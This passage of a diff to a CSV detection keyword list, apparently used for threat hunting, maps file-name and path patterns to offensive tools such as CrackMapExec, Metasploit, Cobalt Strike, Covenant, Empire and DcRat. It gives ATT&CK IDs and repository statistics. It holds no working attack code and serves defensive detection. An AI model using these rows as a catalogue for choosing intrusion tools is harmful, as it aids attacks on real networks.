Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_gpp_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ldap-checker_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_MachineAccountQuota_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ms17-010_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_mssql_priv_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ntlmv1_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_passpol_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_petitpotam_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_printnightmare_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_runasppl_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_shadowcoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smb_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smbsigning_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_subnets_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_trusted-for-delegation_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_ldap_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_nullsess_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_webdav_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_zerologon_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme-macOS-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-ubuntu-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-windows-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*cmpivot.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" -"*cms400net_default_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cms400net_default_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cmVmbGVjdGl2ZQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*CN=PortSwigger*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CN=ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*cnotin/SplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" @@ -8598,12 +8746,12 @@ "*cobaltstrike/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike-dist.tgz*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*cobbr/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*cobbr/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*cobbr/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*cobbr/PSAmsi*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*code_execution/*.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*code_execution/*.exe*","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*code_execution/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.exe*","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*code_execution/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 